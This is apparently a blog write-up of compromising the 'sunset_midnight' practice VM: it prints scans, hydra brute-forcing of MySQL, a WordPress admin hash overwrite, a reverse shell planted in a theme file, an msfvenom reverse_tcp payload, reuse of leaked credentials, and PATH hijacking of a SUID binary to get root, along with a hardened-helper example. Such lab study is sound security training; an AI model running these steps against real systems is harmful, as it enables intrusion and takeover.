sunset_midnight target machine

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.132
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 08:17 EDT
Nmap scan report for 192.168.56.132
Host is up (0.00018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 08:00:27:91:BF:42 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds

Ports 22, 80 and 3306 are open. First check whether MySQL allows a passwordless login. I try this first because in the past, while scanning with nmap, my IP got banned, and only after a reboot could I log in to MySQL without a password.

┌──(kali㉿kali)-[~]
└─$ mysql -uroot 192.168.56.132
ERROR 2002 (HY000): Can't connect to local server through socket '/run/mysqld/mysqld.sock' (2)

┌──(kali㉿kali)-[~]
└─$ mysql -uroot 192.168.56.132 -p
Enter password:
ERROR 2002 (HY000): Can't connect to local server through socket '/run/mysqld/mysqld.sock' (2)

Put that aside for now and look at other information first. (The error shows the client tried the local socket: without -h, the positional argument is taken as the database name rather than the host.)

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.56.132
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 08:19 EDT
Nmap scan report for 192.168.56.132
Host is up (0.00033s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
| 256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_ 256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Did not follow redirect to http://sunset-midnight/
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
| Thread ID: 14
| Capabilities flags: 63486
| Some Capabilities: Speaks41ProtocolNew, FoundRows, DontAllowDatabaseTableColumn, Support41Auth, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, SupportsLoadDataLocal, LongColumnFlag, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, ODBCClient, ConnectWithDatabase, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: SmLrz0y6?xba?WvoGVZC
|_ Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:91:BF:42 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.48 seconds

Summarizing the information: Debian; the hosts file needs an entry (the HTTP title shows a redirect to http://sunset-midnight/); robots.txt lists the directory /wp-admin/, which means the site runs WordPress; mysql-info gives detailed MySQL information, so that may be an entry point. Next, scan with the vulnerability scripts.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,3306 192.168.56.132
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 22:46 EDT
Nmap scan report for sunset-midnight (192.168.56.132)
Host is up (0.00026s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
| http-enum:
| /blog/: Blog
| /wp-login.php: Possible admin folder
| /wp-json: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.4.2
| /feed/: Wordpress version: 5.4.2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
|_ /contact/: Potentially interesting folder
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:91:BF:42 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 48.21 seconds

The results are mostly the usual WordPress directories. Searching for information related to mysql-info to find a lead:

(A writeup of another target machine came up; it mentions the brute-forcing approach.)

MySQL password brute-forcing

The empty-password login failed earlier, so here I use hydra to brute-force the password on the MySQL port.

┌──(kali㉿kali)-[~/Downloads/sunset_midnight]
└─$ sudo hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.56.132 mysql
[sudo] password for kali:
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-02 09:25:00
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.56.132:3306/
[3306][mysql] host: 192.168.56.132 login: root password: robert
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-02 09:25:14

Brute-forcing yielded the database credentials root:robert. Log in and look for anything interesting.

┌──(kali㉿kali)-[~]
└─$ mysql -u root -h 192.168.56.132 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 14
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress_db |
+--------------------+
4 rows in set (0.003 sec)

MariaDB [(none)]> use wordpress_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 | | 0 | admin |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.001 sec)

The password hash is found. Online lookup sites gave nothing, and john ran for five or six minutes without result, so I gave up on that and just recorded the hash for now. I then tried the UDF privilege-escalation method, but the write failed because the plugin directory is not writable; I also tried invoking system commands, but what actually ran were commands on my local Kali.

Changing the WordPress user's password in the database

So the only option left is to replace the WordPress user's password in the database. A search found a site that generates WordPress password hashes online:

Online WordPress password generator, chacuo.net

Copy the result and write it into the database.

MariaDB [wordpress_db]> update wp_users SET user_pass='$P$BxmtX6aP2R/qqkrwLmnN7qnjJ5z6Jg1' where user_login='admin'; 
Query OK, 1 row affected (0.004 sec)
Rows matched: 1 Changed: 1 Warnings: 0

MariaDB [wordpress_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BxmtX6aP2R/qqkrwLmnN7qnjJ5z6Jg1 | admin | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 | | 0 | admin |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.001 sec)

Getting a shell from the WordPress admin panel

Logging in to WordPress as admin:123456 succeeded.

Next is the usual approach: edit the theme's 404.php file. But the update hit an error:

Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

After that I tried uploading a PHP file directly, uploading a zipped PHP file as a plugin, and uploading a zipped directory containing a PHP file as a theme, but because the WordPress version is fairly new, each ran into problems and none succeeded.

Googling the error message, the first link gave a possible solution:

php - WordPress Editor not updating files: Unable to communicate back with site to check for fatal errors - Stack Overflow

I tried installing the plugin https://wordpress.org/plugins/theme-editor/#installation; after installing it, editing 404.php succeeded.

Start a listener, then visit http://sunset-midnight/wp-content/themes/twentyseventeen/404.php

┌──(kali㉿kali)-[~/Downloads/sunset_midnight]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.132] 44338
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
23:38:47 up 43 min, 0 users, load average: 0.00, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:91:bf:42 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.132/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 421sec preferred_lft 421sec
inet6 fe80::a00:27ff:fe91:bf42/64 scope link
valid_lft forever preferred_lft forever
$ uname -a
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@midnight:/$

Privilege escalation

The reverse shell works; next, look at the web root.

www-data@midnight:/var/www/html$ ls -liah
ls -liah
total 12K
7643 drwxr-xr-x 3 root root 4.0K Jul 16 2020 .
7642 drwxr-xr-x 3 root root 4.0K Jul 16 2020 ..
272451 drwxr-x--- 5 www-data www-data 4.0K Aug 2 23:17 wordpress
www-data@midnight:/var/www/html$ cd wordpress
cd wordpress
www-data@midnight:/var/www/html/wordpress$ ls -alih
ls -alih
total 220K
272451 drwxr-x--- 5 www-data www-data 4.0K Aug 2 23:17 .
7643 drwxr-xr-x 3 root root 4.0K Jul 16 2020 ..
272450 -rw-r--r-- 1 www-data www-data 461 Jul 16 2020 .htaccess
273192 -rw-r----- 1 www-data www-data 499 Jul 18 2020 index.php
273197 -rw-r----- 1 www-data www-data 20K Feb 12 2020 license.txt
273190 -rw-r----- 1 www-data www-data 7.2K Jan 10 2020 readme.html
274695 -rw-r----- 1 www-data www-data 6.8K Feb 6 2020 wp-activate.php
278726 drwxr-x--- 9 www-data www-data 4.0K Jun 10 2020 wp-admin
273189 -rw-r----- 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php
275241 -rw-r----- 1 www-data www-data 2.3K Jun 2 2020 wp-comments-post.php
273194 -rw-r----- 1 www-data www-data 3.2K Jul 18 2020 wp-config.php
278538 drwxr-x--- 6 www-data www-data 4.0K Aug 2 23:35 wp-content
273193 -rw-r----- 1 www-data www-data 3.9K Feb 6 2020 wp-cron.php
278594 drwxr-x--- 21 www-data www-data 12K Jun 10 2020 wp-includes
273587 -rw-r----- 1 www-data www-data 2.5K Feb 6 2020 wp-links-opml.php
273588 -rw-r----- 1 www-data www-data 3.3K Feb 6 2020 wp-load.php
273195 -rw-r----- 1 www-data www-data 47K Feb 9 2020 wp-login.php
273586 -rw-r----- 1 www-data www-data 8.4K Apr 14 2020 wp-mail.php
273196 -rw-r----- 1 www-data www-data 19K Apr 9 2020 wp-settings.php
273191 -rw-r----- 1 www-data www-data 31K Feb 6 2020 wp-signup.php
275240 -rw-r----- 1 www-data www-data 4.7K Feb 6 2020 wp-trackback.php
273186 -rw-r----- 1 www-data www-data 3.1K Feb 6 2020 xmlrpc.php

Lateral movement

Reading wp-config.php gives the password of the database user jose:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'jose' );

/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

The home directory contains a user jose, so try whether the database password is reused for jose's account.

www-data@midnight:/var/www/html/wordpress$ su jose
su jose
Password: 645dc5a8871d2a4269d4cbe23f6ae103

jose@midnight:/var/www/html/wordpress$ whoami
whoami
jose
jose@midnight:/var/www/html/wordpress$ id
id
uid=1000(jose) gid=1000(jose) groups=1000(jose),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
jose@midnight:/var/www/html/wordpress$ uname -a
uname -a
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
jose@midnight:/var/www/html/wordpress$ sudo -l
sudo -l
[sudo] password for jose: 645dc5a8871d2a4269d4cbe23f6ae103

Sorry, user jose may not run sudo on midnight.

The shell is not very interactive, but port 22 is open, so try logging in via SSH.

┌──(kali㉿kali)-[~/Downloads/sunset_midnight]
└─$ ssh jose@192.168.56.132
jose@192.168.56.132's password:
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jul 18 15:33:29 2020 from 192.168.100.139
jose@midnight:~$ id
uid=1000(jose) gid=1000(jose) groups=1000(jose),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

Check the scheduled tasks.

jose@midnight:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Nothing useful there; look in the home directory.

jose@midnight:/var/www/html/wordpress$ cd ~
cd ~
jose@midnight:~$ ls -laih
ls -laih
total 28K
272437 drwxr-xr-x 3 jose jose 4.0K Jul 18 2020 .
262151 drwxr-xr-x 3 root root 4.0K Jul 16 2020 ..
273166 lrwxrwxrwx 1 root root 9 Jul 16 2020 .bash_history -> /dev/null
272439 -rw-r--r-- 1 jose jose 220 Jul 16 2020 .bash_logout
272440 -rw-r--r-- 1 jose jose 3.5K Jul 16 2020 .bashrc
278755 drwxr-xr-x 3 jose jose 4.0K Jul 16 2020 .local
273181 lrwxrwxrwx 1 root root 9 Jul 16 2020 .mysql_history -> /dev/null
272438 -rw-r--r-- 1 jose jose 807 Jul 16 2020 .profile
272059 -rw------- 1 jose jose 33 Jul 16 2020 user.txt
jose@midnight:~$ cat user.txt
cat user.txt
956a9564aa5632edca7b745c696f6575

That gives the user flag first.

Next, look for a privilege-escalation path; check the SUID files.

jose@midnight:/tmp$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
134749 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
152548 156 -rwsr-xr-x 1 root root 157192 Feb 2 2020 /usr/bin/sudo
275266 20 -rwsr-sr-x 1 root root 16768 Jul 18 2020 /usr/bin/status
131131 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
131136 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
131132 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
135085 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
134602 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
135083 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
131134 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
268427 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
143469 52 -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
146860 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign

One file looks unfamiliar: /usr/bin/status. Try running it.

jose@midnight:/tmp$ /usr/bin/status
/usr/bin/status
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)
Active: active (running) since Wed 2023-08-02 22:55:33 EDT; 50min ago
Docs: man:sshd(8)
man:sshd_config(5)
Process: 410 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
Main PID: 452 (sshd)
Tasks: 1 (limit: 1150)
Memory: 3.6M
CGroup: /system.slice/ssh.service
└─452 /usr/sbin/sshd -D

Aug 02 22:55:33 midnight systemd[1]: Starting OpenBSD Secure Shell server...
Aug 02 22:55:33 midnight sshd[452]: Server listening on 0.0.0.0 port 22.
Aug 02 22:55:33 midnight sshd[452]: Server listening on :: port 22.
Aug 02 22:55:33 midnight systemd[1]: Started OpenBSD Secure Shell server.

It is a service status check; look at the readable strings in the binary.

jose@midnight:~$ strings /usr/bin/status
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Status of the SSH server:
service ssh status
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
status.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

There is a command "service ssh status", and it is invoked by a relative path (the binary calls system(), which resolves "service" through the caller's PATH). So try privilege escalation via the SUID binary and the PATH environment variable.
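Why the relative "service" inside system("service ssh status") matters: the program below is an added defensive example (not the VM's original status.c) showing how such a helper can be written so that the caller's PATH and environment play no role. It assumes /usr/sbin/service is the absolute path of the service script on Debian.

```c
/* Hardened "status" helper (added example, not the VM's status.c): it never
 * consults PATH, runs a fixed absolute program with fixed arguments, and
 * hands the child a minimal environment instead of the caller's. */
#include <errno.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Environment given to the child; nothing is inherited from the caller,
 * so a PATH entry such as "." added by the invoking user has no effect. */
static char *const safe_env[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* Fork and execve() an absolute path with a clean environment.
 * Returns the child's exit status, or -1 on error. Relative paths are
 * refused outright, so no directory lookup can ever take place. */
int run_clean(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/') {
        errno = EINVAL;
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, safe_env);
        _exit(127);             /* only reached if execve() failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Same intent as the binary on the VM, but with an absolute path, no
     * shell in between, and no setuid()/setgid(): querying a service's
     * status needs no root privileges at all. */
    char *const argv[] = { "service", "ssh", "status", NULL };
    printf("Status of the SSH server:\n");
    fflush(stdout);
    int rc = run_clean("/usr/sbin/service", argv);
    return rc < 0 ? 1 : rc;
}
```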

Privilege escalation via SUID and the PATH environment variable

I went back to the red-team notes for this part, because the reverse-shell program I built myself gave no output after it connected back.

┌──(kali㉿kali)-[~]
└─$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -f elf >shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068640 bytes
Final size of elf file: 1068640 bytes


┌──(kali㉿kali)-[~/Downloads/sunset_midnight]
└─$ sudo nc -lvnp 4444
[sudo] password for kali:
listening on [any] 4444 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.132] 51694
whoami
id
pwd
?
^C

First put the current directory at the front of PATH.

jose@midnight:/tmp$ export PATH=.:$PATH
jose@midnight:/tmp$ echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Then write a C source file and compile it.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* declares setgid() and setuid(); without it gcc warns about implicit declarations */

int main(void)
{
    /* the SUID binary runs this with effective uid/gid 0; make them real */
    setgid(0);
    setuid(0);
    system("/bin/bash -p");   /* -p: do not drop the elevated privileges */
    return 0;
}

Edit and compile:

jose@midnight:/tmp$ vim service.c
-bash: vim: command not found
jose@midnight:/tmp$ vi service.c
jose@midnight:/tmp$ gcc service.c -o service
service.c: In function ‘main’:
service.c:5:2: warning: implicit declaration of function ‘setgid’; did you mean ‘setenv’? [-Wimplicit-function-declaration]
setgid(0);
^~~~~~
setenv
service.c:6:2: warning: implicit declaration of function ‘setuid’; did you mean ‘setenv’? [-Wimplicit-function-declaration]
setuid(0);
^~~~~~
setenv
jose@midnight:/tmp$ ls
service systemd-private-2e417010f87c4bc78758e4440be734b2-apache2.service-T1TnPZ
service.c systemd-private-2e417010f87c4bc78758e4440be734b2-systemd-timesyncd.service-e80keR

Despite the warnings the executable was produced; now run the status binary.

jose@midnight:/tmp$ /usr/bin/status
root@midnight:/tmp# whoami
root
root@midnight:/tmp# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(jose)
root@midnight:/tmp# cd /root
root@midnight:/root# ls -laih
total 52K
262153 drwx------ 4 root root 4.0K Jul 18 2020 .
2 drwxr-xr-x 18 root root 4.0K Jul 16 2020 ..
273162 lrwxrwxrwx 1 root root 9 Jul 16 2020 .bash_history -> /dev/null
262359 -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
272012 drwxr-xr-x 3 root root 4.0K Jul 16 2020 .local
273172 lrwxrwxrwx 1 root root 9 Jul 16 2020 .mysql_history -> /dev/null
262358 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
272441 -rw-r--r-- 1 root root 500 Jul 16 2020 root.txt
278753 drwx------ 2 root root 4.0K Jul 18 2020 .ssh
275269 -rwsr-xr-x 1 root root 17K Jul 18 2020 status
272457 -rw-r--r-- 1 root root 139 Jul 18 2020 status.c
root@midnight:/root# cat root.txt
___ ____
/' --;^/ ,-_\ \ | /
/ / --o\ o-\ \\ --(_)--
/-/-/|o|-|\-\\|\\ / | \
'` ` |-| `` '
|-|
|-|O
|-(\,__
...|-|\--,\_....
,;;;;;;;;;;;;;;;;;;;;;;;;,.
~,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;, ______ --------- _____ ------

db2def9d4ddcb83902b884de39d426e6

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

Privilege escalation succeeded.

Addendum

While reading other people's writeups I found that they ran the following commands:

cd /tmp
echo "/bin/sh" > service
chmod +x service
export PATH=/tmp/:$PATH
/usr/bin/status

I looked up why a file whose content is only /bin/sh can still be recognized and executed:
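As an added example (not from the original post), the program below demonstrates the mechanism in question: execve(2) rejects a file that is neither an ELF binary nor starts with a "#!" line and fails with ENOEXEC, whereas execvp(3), and /bin/sh itself (which system(3) runs), then fall back to interpreting the file as a shell script. The script file path /tmp/noexec_demo.sh and its one-line content are constructed for the demo.

```c
/* Added example (not from the original post): a text file with no "#!" line
 * fails execve() with ENOEXEC, but the execvp() shell fallback still runs it. */
#include <errno.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

#define DEMO_PATH "/tmp/noexec_demo.sh"   /* constructed file, no #! line */

/* Create a one-line script without a shebang; exit code 42 proves it ran. */
int make_plain_script(void)
{
    FILE *f = fopen(DEMO_PATH, "w");
    if (f == NULL)
        return -1;
    fputs("exit 42\n", f);
    fclose(f);
    return chmod(DEMO_PATH, 0755);
}

/* Run fn() in a child and return its exit status (-1 on fork/wait error). */
static int child_status(void (*fn)(void))
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        fn();
        _exit(99);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

static void try_execve(void)
{
    char *const argv[] = { DEMO_PATH, NULL };
    char *const envp[] = { NULL };
    execve(DEMO_PATH, argv, envp);
    /* the kernel refused the file; report whether the reason was ENOEXEC */
    _exit(errno == ENOEXEC ? 100 : 101);
}

static void try_execvp(void)
{
    char *const argv[] = { DEMO_PATH, NULL };
    execvp(DEMO_PATH, argv);   /* glibc re-runs "/bin/sh DEMO_PATH" on ENOEXEC */
    _exit(101);
}

/* Returns 100 when execve() failed with ENOEXEC. */
int direct_execve_result(void)
{
    return make_plain_script() == 0 ? child_status(try_execve) : -1;
}

/* Returns 42 when the shell fallback executed the script. */
int execvp_result(void)
{
    return make_plain_script() == 0 ? child_status(try_execvp) : -1;
}

int main(void)
{
    printf("execve: %d (100 = ENOEXEC)\n", direct_execve_result());
    printf("execvp: %d (42 = ran as a shell script)\n", execvp_result());
    return 0;
}
```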

Source: https://i3eg1nner.github.io/2023/08/7478c51012fb.html
Author: I3eg1nner
Published: 2023-08-02